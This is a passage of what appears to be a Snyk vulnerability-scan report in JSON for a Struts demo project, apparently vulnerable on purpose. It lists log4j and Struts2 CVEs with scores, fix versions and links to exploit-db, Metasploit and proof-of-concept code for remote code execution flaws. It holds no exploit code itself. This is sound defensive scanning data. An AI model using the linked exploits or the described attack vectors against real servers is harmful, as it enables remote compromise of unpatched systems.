"CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2020-04-28T17:16:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-14T11:19:13.272608Z", - "socialTrendAlert": false, - 
"severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.13.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Alvaro Munoz", - "Masato Anzai" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.26)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.5.26" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/phil-fly/CVE-2020-17530", - "title": "PoC" - }, - { - "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", - "title": "PoC" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:37.704300Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": 
"Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:56.396718Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:37.704300Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", - "epssDetails": { - "percentile": "0.99845", - "probability": "0.97257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-17530" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": 
"org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-12-08T19:30:16.810323Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-12-08T19:25:45Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-12-08T19:25:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.269995Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.26" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Chris McCown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.5.30)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.5.30" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", - "title": "GitHub Commit" - }, - { - "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", - "title": "GitHub Security Lab - Double Evaluation in Struts" - }, - { - "url": 
"https://cwiki.apache.org/confluence/display/WW/S2-062", - "title": "Struts Security Advisory" - }, - { - "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", - "title": "Write Up & PoC" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:49:12.874796Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:56.453682Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:12.874796Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", - "epssDetails": { - "percentile": "0.96232", - "probability": "0.18558", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-31805" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2022-04-12T20:32:06.687703Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-12T20:27:34Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2022-04-12T20:33:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:18.536966Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.30" - ], - "isUpgradable": true, - "isPatchable": false, - "name": 
"org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", - "title": "Manipulation of Struts' internals", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Viettel Information Security Center" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.24.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.24.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-026.html", - "title": "Vulnerability Summary" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:56.364720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:01.496065Z" - } - ], - "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. 
It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", - "epssDetails": { - "percentile": "0.70008", - "probability": "0.00305", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5209" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-07-01T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2015-07-01T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:01.496065Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.24.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Nike Zheng" - ], - "semver": { - "vulnerable": [ - "[2.3.7, 2.3.32)", - "[2.5.0, 2.5.10.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.32", - "2.5.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.3.5, 2.3.32)" - ], - 
"functionId": { - "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", - "className": "JakartaMultiPartRequest", - "functionName": "buildErrorMessage" - } - }, - { - "version": [ - "[2.5.0, 2.5.10.1)" - ], - "functionId": { - "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", - "className": "FileUploadInterceptor", - "functionName": "intercept" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", - "title": "CVE Details" - }, - { - "url": "https://exploit-db.com/exploits/41614", - "title": "Exploit DB" - }, - { - "url": "https://www.exploit-db.com/exploits/41570/", - "title": "Exploit DB" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/issues/8064", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/rapid7/metasploit-framework/pull/8072", - "title": "GitHub PR" - }, - { - "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", - "title": "PoC" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", - "title": "Struts Wiki" - }, - { - "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", - "title": "Talos Intelligence Blog" - }, - { - "url": "https://www.exploit-db.com/exploits/41570", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:47:26.418639Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:03.020507Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:26.418639Z" - } - ], - "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. 
To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", - "epssDetails": { - "percentile": "0.99996", - "probability": "0.97546", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-5638" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-j77q-2qqg-6989" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-03-19T10:28:21.873000Z", - "functions_new": [ - { - "version": [ - 
"[2.3.5, 2.3.32)" - ], - "functionId": { - "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", - "functionName": "buildErrorMessage" - } - }, - { - "version": [ - "[2.5.0, 2.5.10.1)" - ], - "functionId": { - "className": "org.apache.struts2.interceptor.FileUploadInterceptor", - "functionName": "intercept" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-03-05T22:00:00Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-03-21T15:30:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.313495Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", - "title": "Command Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.20.2)", - "[2.3.24, 2.3.24.2)", - "[2.3.28, 2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": 
"https://exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.554699Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. 
When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", - "epssDetails": { - "percentile": "0.99987", - "probability": "0.97524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3081" - ], - "CWE": [ - "CWE-77" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.315000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T04:32:51Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-04-22T04:32:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:20.892839Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": 
"SNYK-JAVA-ORGAPACHESTRUTS-30771", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.20.2)", - "[2.3.24,2.3.24.2)", - "[2.3.28,2.3.28.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:47.685356Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.390655Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.685356Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. 
It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95903", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3082" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.327000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T02:36:52.273000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-04-22T02:36:52.273000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:47.685356Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30772", - "title": "Arbitrary Command Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.20.2)", - "[2.3.24,2.3.24.3)", - "[2.3.28,2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.3", - "2.3.28.1" - ], - "patches": [], - "insights": { - 
"triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/39919", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39919", - "title": "Exploit DB" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:49.896841Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - 